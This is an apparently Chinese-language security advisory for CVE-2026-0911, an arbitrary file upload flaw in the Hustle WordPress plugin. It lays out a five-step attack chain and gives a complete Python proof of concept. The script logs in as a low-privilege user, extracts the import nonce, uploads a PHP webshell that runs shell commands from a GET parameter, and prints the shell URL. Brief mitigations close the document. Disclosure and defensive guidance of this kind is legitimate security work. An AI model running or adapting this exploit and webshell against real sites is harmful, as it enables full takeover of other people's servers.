CVE-2026-0911 WordPress Hustle插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2026-0911

漏洞类型

任意文件上传/远程代码执行

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Hustle – Email Marketing, Lead Generation, Optins, Popups (WordPress插件)

漏洞概述

CVE-2026-0911是WordPress平台下Hustle邮件营销插件的一个高危安全漏洞。该插件被广泛应用于WordPress网站，用于邮件营销、潜在客户生成、订阅表单和弹窗功能。漏洞源于action_import_module()函数中不正确的文件类型验证机制，攻击者可以利用此漏洞绕过安全检查，上传任意文件到服务器。由于WordPress插件通常具有较高的服务器访问权限，成功利用此漏洞可能导致远程代码执行，使攻击者完全控制受影响的网站服务器。该漏洞的危险性在于即使是非管理员用户（如订阅者级别的用户），在获得特定权限后也可能发起攻击，只要管理员错误地授予了该用户Hustle模块权限。

技术细节

漏洞存在于Hustle插件的action_import_module()函数中，该函数负责处理模块导入功能。问题出在文件类型验证逻辑上，攻击者可以通过构造特定的HTTP请求，绕过客户端的文件类型检查，上传.php等可执行脚本文件到服务器。漏洞利用的关键步骤包括：首先需要获取有效的WordPress账户（至少订阅者级别），然后需要管理员授予Hustle模块权限或模块编辑权限，接着访问Hustle管理页面获取CSRF nonce值，最后通过发送精心构造的multipart/form-data请求到wp-admin/admin-ajax.php端点，利用action_import_module动作上传恶意文件。上传的文件通常位于wp-content/uploads/hustle-files/目录下，攻击者可以通过直接访问上传的文件路径来执行任意代码。由于该函数在文件上传前未正确验证文件扩展名和MIME类型，导致安全绕过。

攻击链分析

STEP 1

步骤1: 获取低权限账户

攻击者首先需要拥有一个WordPress账户，至少需要订阅者(Subscriber)级别的权限。可以通过注册功能或已存在的账户获取。

STEP 2

步骤2: 获取模块权限

需要网站管理员错误地将Hustle模块权限或模块编辑访问权限授予该低权限用户，使攻击者能够访问Hustle管理界面。

STEP 3

步骤3: 获取CSRF Nonce

攻击者访问Hustle管理页面(hustle_modules)，从页面源代码中提取action_import_module()函数所需的CSRF nonce值。

STEP 4

步骤4: 构造恶意请求

攻击者构造包含恶意PHP文件的HTTP请求，绕过文件类型验证，通过action_import_module动作上传webshell到服务器。

STEP 5

步骤5: 执行远程代码

攻击者通过HTTP请求直接访问上传的webshell文件，利用GET参数执行任意系统命令，实现远程代码执行，从而完全控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from bs4 import BeautifulSoup

# CVE-2026-0911 PoC - Arbitrary File Upload in Hustle WordPress Plugin
# Target: WordPress site with Hustle plugin <= 7.8.9.2

TARGET = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "password"

def get_nonce(session, target):
    """Extract nonce from Hustle admin page"""
    url = f"{target}/wp-admin/admin.php?page=hustle_modules"
    response = session.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    nonce_input = soup.find('input', {'name': 'hustle_module_import_nonce'})
    if nonce_input:
        return nonce_input.get('value')
    return None

def exploit(target, username, password):
    """Exploit arbitrary file upload vulnerability"""
    session = requests.Session()
    
    # Step 1: Authenticate
    login_url = f"{target}/wp-login.php"
    login_data = {'log': username, 'pwd': password, 'wp-submit': 'Log In'}
    session.post(login_url, data=login_data)
    
    # Step 2: Get nonce
    nonce = get_nonce(session, target)
    if not nonce:
        print("[-] Failed to obtain nonce. Admin may not have granted permissions.")
        return False
    
    # Step 3: Upload malicious file
    upload_url = f"{target}/wp-admin/admin-ajax.php"
    
    # PHP webshell content
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    
    files = {
        'file': ('shell.php', webshell, 'application/octet-stream')
    }
    data = {
        'action': 'hustle_module_import',
        'hustle_module_import_nonce': nonce,
        'hustle_module_type': 'popup'
    }
    
    response = session.post(upload_url, data=data, files=files)
    
    if 'success' in response.text or response.status_code == 200:
        print("[+] File uploaded successfully!")
        print(f"[+] Access shell at: {target}/wp-content/uploads/hustle-files/shell.php?cmd=id")
        return True
    else:
        print("[-] Upload failed")
        return False

if __name__ == "__main__":
    exploit(TARGET, USERNAME, PASSWORD)

影响范围

Hustle插件所有版本 <= 7.8.9.2

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 检查并撤销所有非管理员用户的Hustle模块权限；2) 临时禁用Hustle插件的文件导入功能；3) 配置Web服务器禁止wp-content/uploads/hustle-files/目录下的PHP文件执行；4) 启用WordPress安全插件进行行为监控和异常检测。同时建议在WordPress后台删除所有未知来源的用户账户，并检查服务器是否存在可疑的webshell文件。